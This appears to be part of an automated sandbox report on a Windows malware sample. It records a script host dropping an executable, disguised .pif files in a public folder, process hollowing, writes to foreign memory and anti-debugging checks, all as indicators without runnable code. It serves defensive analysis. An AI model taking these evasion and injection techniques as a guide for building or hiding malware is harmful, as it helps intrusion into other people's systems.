            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\liuuazhU.pifMemory allocated: 1CFC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifMemory allocated: 1D420000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifMemory allocated: 1D270000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifMemory allocated: 2A6B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifMemory allocated: 2AD30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifMemory allocated: 2A6E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifMemory allocated: 1C320000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\liuuazhU.pifMemory allocated: 1C7F0000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\liuuazhU.pifMemory allocated: 1C320000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeDropped PE file which has not been started: C:\Windows \SysWOW64\svchost.pifJump to dropped file
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFAPI coverage: 9.9 %
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027D5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,1_2_027D5908
            Source: x.exe, 00000001.00000002.1855286953.00000000006DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
            Source: x.exe, 00000001.00000002.1855286953.0000000000726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: liuuazhU.pif, 00000006.00000002.3107311092.000000001B365000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
            Source: Uhzauuil.PIF, 0000000A.00000002.1966101985.00000000005B3000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3115243566.0000000028D19000.00000004.00000020.00020000.00000000.sdmp, Uhzauuil.PIF, 00000010.00000002.2047682326.0000000000582000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3108316011.000000001A54B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\x.exeAPI call chain: ExitProcess graph end nodegraph_1-28284
            Source: C:\Users\Public\Libraries\liuuazhU.pifAPI call chain: ExitProcess graph end nodegraph_6-45721
            Source: C:\Users\Public\Libraries\liuuazhU.pifAPI call chain: ExitProcess graph end nodegraph_11-45410
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFAPI call chain: ExitProcess graph end node
            Source: C:\Users\Public\Libraries\liuuazhU.pifAPI call chain: ExitProcess graph end node
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027EFA38 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,1_2_027EFA38
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFProcess queried: DebugPortJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFProcess queried: DebugPort
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20185F38 LdrInitializeThunk,LdrInitializeThunk,6_2_20185F38
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040CE09
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E8818 LoadLibraryW,GetProcAddress,FreeLibrary,1_2_027E8818
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_0040ADB0 GetProcessHeap,HeapFree,6_2_0040ADB0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040CE09
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040E61C
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00416F6A
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_004123F1 SetUnhandledExceptionFilter,6_2_004123F1
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0040CE09
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0040E61C
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00416F6A
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_004123F1 SetUnhandledExceptionFilter,11_2_004123F1
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_1_0040CE09
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_1_0040E61C
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_1_00416F6A
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_1_004123F1 SetUnhandledExceptionFilter,11_1_004123F1
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_0040CE09
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_0040E61C
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00416F6A
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_004123F1 SetUnhandledExceptionFilter,17_2_004123F1
            Source: C:\Users\Public\Libraries\liuuazhU.pifMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Benign windows process drops PE files
            Source: C:\Windows\System32\wscript.exeFile created: x.exe.0.drJump to dropped file
            Allocates memory in foreign processes
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Users\Public\Libraries\liuuazhU.pif base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFMemory allocated: C:\Users\Public\Libraries\liuuazhU.pif base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFMemory allocated: C:\Users\Public\Libraries\liuuazhU.pif base: 400000 protect: page execute and read and write
            Sample uses process hollowing technique
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection unmapped: C:\Users\Public\Libraries\liuuazhU.pif base address: 400000Jump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection unmapped: C:\Users\Public\Libraries\liuuazhU.pif base address: 400000Jump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection unmapped: C:\Users\Public\Libraries\liuuazhU.pif base address: 400000
            Writes to foreign memory regions
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Users\Public\Libraries\liuuazhU.pif base: 204008Jump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFMemory written: C:\Users\Public\Libraries\liuuazhU.pif base: 295008Jump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFMemory written: C:\Users\Public\Libraries\liuuazhU.pif base: 370008
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\liuuazhU.pif C:\Users\Public\Libraries\liuuazhU.pifJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFProcess created: C:\Users\Public\Libraries\liuuazhU.pif C:\Users\Public\Libraries\liuuazhU.pifJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFProcess created: C:\Users\Public\Libraries\liuuazhU.pif C:\Users\Public\Libraries\liuuazhU.pif
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,1_2_027D5ACC
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,1_2_027DA7C4
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,1_2_027D5BD8
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,1_2_027DA810
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: GetLocaleInfoA,6_2_00417A20
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: GetLocaleInfoA,11_2_00417A20
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: GetLocaleInfoA,11_1_00417A20
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_02985ACC
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_02985BD7
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFCode function: GetLocaleInfoA,16_2_0298A810
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: GetLocaleInfoA,17_2_00417A20
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
